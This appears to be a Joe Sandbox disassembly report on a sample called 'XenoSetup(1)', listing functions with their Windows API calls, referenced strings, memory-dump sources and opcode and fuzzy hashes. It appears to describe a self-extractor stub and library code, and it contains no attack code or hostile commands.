Function 00FFD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00FFD7AE
ShellExecuteExW.SHELL32(?), ref: 00FFD8DE
ShowWindow.USER32(?,00000000), ref: 00FFD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00FFD959
CloseHandle.KERNEL32(?), ref: 00FFD97F
ShowWindow.USER32(?,00000001), ref: 00FFD9E1

Strings

.exe, xrefs: 00FFD989
.inf, xrefs: 00FFD89A

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 320ac24e9c7a0d9f1a64d4337f23fda9bbf040c2aab9ad5343cff04aeb774c62
Instruction ID: ac7cf08c0b0a823a6009fe4e632716e0cb74798185b5e57a4a007f7b63362573
Opcode Fuzzy Hash: 320ac24e9c7a0d9f1a64d4337f23fda9bbf040c2aab9ad5343cff04aeb774c62
Instruction Fuzzy Hash: 3D51E7718043889ADB319F64D844BBB7BFAAF817A4F04041DF7C1971B4E7B98944EB52

Function 0100A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01005695,01005695,?,?,?,0100ABAC,00000001,00000001,2DE85006), ref: 0100A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0100ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0100AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0100AB35
__freea.LIBCMT ref: 0100AB42

Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38

__freea.LIBCMT ref: 0100AB4B
__freea.LIBCMT ref: 0100AB70

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4ee6073a8b0986ad6d9d60ce99fb90d659cbb1435d0a8a22b396f9db9cc74afe
Instruction ID: d50195120fe247807d7b2d7d457ae2f306fac819a38939f0f106c6c3c22fd7ba
Opcode Fuzzy Hash: 4ee6073a8b0986ad6d9d60ce99fb90d659cbb1435d0a8a22b396f9db9cc74afe
Instruction Fuzzy Hash: 5E51A072700716EAFB268E68CC41EBFBBEAEB44650F154A69FD84D71C1DB34DC908690

Function 01003B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,01003C35,?,?,01042088,00000000,?,01003D60,00000004,InitializeCriticalSectionEx,01016394,InitializeCriticalSectionEx,00000000), ref: 01003C03

Strings

api-ms-, xrefs: 01003BC3

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: ea26fd4bfea4f88e81bc0aca903dfd2a7da7296ff73994dac190d97f0d9d5288
Instruction ID: 771f94dcc40342c15f04c93738298ff3960a8f609dab574661198e86041b9674
Opcode Fuzzy Hash: ea26fd4bfea4f88e81bc0aca903dfd2a7da7296ff73994dac190d97f0d9d5288
Instruction Fuzzy Hash: D011C431A45A25AFEB338A5C9C40B9D3BE4BB01674F1101A0FAD5EF2C4D776E90087D0

Function 00FE98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00FE7760,?,00000005,?,00000011), ref: 00FE995F
GetLastError.KERNEL32(?,?,00FE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00FE7760,?,00000005,?), ref: 00FE99A2
GetLastError.KERNEL32(?,?,00FE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FE7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE99F9

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: da115f1fed81bf411f974015585302fbc02e5c413d03d0cc2bf6c809a656d2e4
Instruction ID: f8eb080a600f166f4a42e8839aab4ac8258efc16a5eadf52f901a10007da495b
Opcode Fuzzy Hash: da115f1fed81bf411f974015585302fbc02e5c413d03d0cc2bf6c809a656d2e4
Instruction Fuzzy Hash: 4631F5309487856FE7309E25CC45BEABBE4BB44330F100B19F9E1961C2D7E99844DBA5

Function 00FFB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
TranslateMessage.USER32(?), ref: 00FFB5AC
DispatchMessageW.USER32(?), ref: 00FFB5B6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 797b3907a945be840ce5da9c6aa7773c4e81bf18f0ab9d0d039bcb5606654e1f
Instruction ID: 72b48f7761663bf17dcd7cf24a810c353790edc88dc8003a5ef3bd9821e495c9
Opcode Fuzzy Hash: 797b3907a945be840ce5da9c6aa7773c4e81bf18f0ab9d0d039bcb5606654e1f
Instruction Fuzzy Hash: 63F030B5E01129AB8B309BE1DD8CDEB7FBCEE053A07044515B545D2018EB3CD505CBB0

Function 00FFABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00FFABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00FFABF9

Part of subcall function 00FF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FEC116,00000000,.exe,?,?,00000800,?,?,?,00FF8E3C), ref: 00FF1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00FFABE9

Strings

EDIT, xrefs: 00FFABCD, 00FFABD8, 00FFABE5

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 1ec362fde5f601736d60022a9cafe22bbfabad20dccddd1b23aaef077e705dff
Instruction ID: 2089ca52ecb7187fd64b75ba0b812b403ed51ead88cab498144598fd8b864b10
Opcode Fuzzy Hash: 1ec362fde5f601736d60022a9cafe22bbfabad20dccddd1b23aaef077e705dff
Instruction Fuzzy Hash: 62F0E2B2A0022C77DA3096649C0AFAB726CAF82B10F480111BB44E60C4D769D941C6B6

Function 00FFAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
Part of subcall function 00FF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858

OleInitialize.OLE32(00000000), ref: 00FFAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FFAC66
SHGetMalloc.SHELL32(01028438), ref: 00FFAC70

Strings

riched20.dll, xrefs: 00FFAC1E

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 9b0442fae4fdc1bf763c394e67b00f0e5569830f584a84387ecdd25266330853
Instruction ID: 293fa45a9496d5c40eddb60f59cd4b9d9b865490b3216078e854b53bd92a0579
Opcode Fuzzy Hash: 9b0442fae4fdc1bf763c394e67b00f0e5569830f584a84387ecdd25266330853
Instruction Fuzzy Hash: 7AF04FB5D00219ABCB10AFA9D9499AFFBFCFF84700F10415AE541E2215CBB85605CBA1

Function 00FFDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FFDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FFDC30

Strings

sfxcmd, xrefs: 00FFDBEF
sfxpar, xrefs: 00FFDC2B

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 779412aa92279dad2b3a727a446518aac2e0afa7e02437ec348b27982feb0fe1
Instruction ID: 84eeb2ae973f70f9224fee1cb0210ed634609bcd3c90301736be5e26fc9c8f06
Opcode Fuzzy Hash: 779412aa92279dad2b3a727a446518aac2e0afa7e02437ec348b27982feb0fe1
Instruction Fuzzy Hash: 1EF0ECB240422C67DB211F958C06FFA376DBF05B91B040415BFC59E125E6FC8840E7B0

Function 00FE9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FE9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00FE97AD
GetLastError.KERNEL32 ref: 00FE97DF
GetLastError.KERNEL32 ref: 00FE97FE

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 839618ddbdc7d895e5c43b3dd8b10d3940d83308075c9fad6bb7a054c301664b
Instruction ID: b936a1c19d5e05aefd543f491796681844afd0951192ee958e97ded0daee9b10
Opcode Fuzzy Hash: 839618ddbdc7d895e5c43b3dd8b10d3940d83308075c9fad6bb7a054c301664b
Instruction Fuzzy Hash: EE118231D18244EBDF319E67C8046693BA9FB42370F50862AF45685190D7F99F48FB71

Function 0100AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FED710,00000000,00000000,?,0100ACDB,00FED710,00000000,00000000,00000000,?,0100AED8,00000006,FlsSetValue), ref: 0100AD66
GetLastError.KERNEL32(?,0100ACDB,00FED710,00000000,00000000,00000000,?,0100AED8,00000006,FlsSetValue,01017970,FlsSetValue,00000000,00000364,?,010098B7), ref: 0100AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0100ACDB,00FED710,00000000,00000000,00000000,?,0100AED8,00000006,FlsSetValue,01017970,FlsSetValue,00000000), ref: 0100AD80

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 2b26d449f24d263e889abc4adf462319ef33ab2555ec2f405eb0dfbc276b4186
Instruction ID: 8cb673b87282b33fe621dd4181023893c6c9736096c12e3f9dfc56be5f86ea49
Opcode Fuzzy Hash: 2b26d449f24d263e889abc4adf462319ef33ab2555ec2f405eb0dfbc276b4186
Instruction Fuzzy Hash: 3001D436711322EBE773A96CAC44A9B7F98AF056B2B110625F987D7184DB2AD401C7E0

Function 00FE9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00FED343,00000001,?,?,?,00000000,00FF551D,?,?,?), ref: 00FE9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00FF551D,?,?,?,?,?,00FF4FC7,?), ref: 00FE9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00FED343,00000001,?,?), ref: 00FEA011

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: b2e8781b2804806faf738dba20f9ed44be4b1bd42925e9a272995b6f7ba946f2
Instruction ID: 4fdbd9254f0cd597cab6d7fc1b51ddbf732ffb20ab990709b86d93d21d38ee6b
Opcode Fuzzy Hash: b2e8781b2804806faf738dba20f9ed44be4b1bd42925e9a272995b6f7ba946f2
Instruction Fuzzy Hash: D631E732608385AFDB14CF21D818B6E77A5FFC4721F04451DF5819B290C7B9AD48DBA2

Function 00FEA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00FEC27E: _wcslen.LIBCMT ref: 00FEC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA30C
GetLastError.KERNEL32(?,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA329

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 0cf7fd9ee2b7b3c978c8bf7c7d30edb8a4bcb6e42bc5861a499abc9468fd999d
Instruction ID: 55053be64603885b77395f68d7b50c17c5cfea0a165432434161e910b39d285e
Opcode Fuzzy Hash: 0cf7fd9ee2b7b3c978c8bf7c7d30edb8a4bcb6e42bc5861a499abc9468fd999d
Instruction Fuzzy Hash: 0701FC31900294AEEF32AA774C09BFD3388AF0A7A0F044455F941E6085D75EE981F7B3

Function 0100B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0100B8B8

Strings

, xrefs: 0100B8FD

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 492f3c51afeef4ed7469aa95bfc755b31ef7e82d0c4845012d7bd1f0146571db
Instruction ID: c5c45332e81fc9f01acf976be4f9dcc0753eb91a840bdbeddcbfd1f86bd29f4d
Opcode Fuzzy Hash: 492f3c51afeef4ed7469aa95bfc755b31ef7e82d0c4845012d7bd1f0146571db
Instruction Fuzzy Hash: BF41C67450438C9EEB238E688C84BFABBE9EB55304F1804EDD5DA87182D235AA45CF61

Function 0100AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0100AFDD

Strings

LCMapStringEx, xrefs: 0100AF7D, 0100AF87

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: b4144c814141512c6ecfe042d753cad0aaa77edbda4e7026d21f01cdc53567b6
Instruction ID: cd3bc7dcbaa36e9d2d09094de91f7ccdf46c607221b704eebc993cfc4c475b59
Opcode Fuzzy Hash: b4144c814141512c6ecfe042d753cad0aaa77edbda4e7026d21f01cdc53567b6
Instruction Fuzzy Hash: 8301D33260020EBBDF12AF91DC05DEE7F62FF48760F454158FE546A1A0CA7A8931EB90

Function 0100AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0100A56F), ref: 0100AF55

Strings

InitializeCriticalSectionEx, xrefs: 0100AF1B, 0100AF25

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 1bacfa7e4f5a6f18ca5eb0d71350df2ff3498f904877d20a2403ff1d9636b228
Instruction ID: a6f5ae335dc448c3767d46b936d17d2ff7ab4c039ed15c716f4309b9efccbb5f
Opcode Fuzzy Hash: 1bacfa7e4f5a6f18ca5eb0d71350df2ff3498f904877d20a2403ff1d9636b228
Instruction Fuzzy Hash: 0CF0B43168120CFBDB125F55CC05CAE7F61EF44721F404068FE485F264DA7A4A149785

Function 0100ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0100ADEE

Strings

FlsAlloc, xrefs: 0100ADC0, 0100ADCA

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
